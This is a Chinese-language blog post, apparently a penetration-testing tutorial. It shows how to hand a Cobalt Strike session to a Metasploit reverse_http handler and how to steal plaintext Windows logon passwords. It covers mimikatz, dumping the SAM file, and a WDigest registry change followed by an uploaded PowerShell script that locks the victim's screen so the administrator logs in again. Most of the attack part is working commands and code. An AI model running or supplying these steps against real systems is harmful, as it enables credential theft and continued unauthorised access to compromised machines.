cs给msf传shell+mimikatz读取明文密码

目录

cs传递shell给msf

1.msf开启监听:

2.cs添加监听器

mimikatz抓明文密码


cs传递shell给msf

直接进入正题,省去拿shell步骤:

此时cs有一台上线主机:

1.msf开启监听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)

set lhost 本机ip

set lport 自己的端口号

run

2.cs添加监听器

选到foreign http

然后右键点击spawn,对上线主机选择msf这个监听器就好了:

然后就msf这边就上线了:

mimikatz抓明文密码

有一台上线主机,运行mimikatz:

密码是null,是因为官方改的。本来mimikatz是可以抓明文的,mimikatz抓明文原理:

windows输入密码的进程是winlogon.exe

然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中

然后ntlmv2加密后发一份给sma文件

mimikatz就抓内存中的明文。

现在方法就两种:

1.

考虑sam文件了,可以dump出来本地破解出明文

2.

修改注册表

上传一个锁屏脚本,管理员重新输入密码后可以抓明文

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

然后把这个脚本上传到目标机:

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

用cs直接上传:

然后执行:

shell powershell -file c:\aaa.ps1

然后上线主机就锁屏了:

正常情况管理员会登录,然后就可以再用mimicatz抓密码,此时就是明文了:

  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值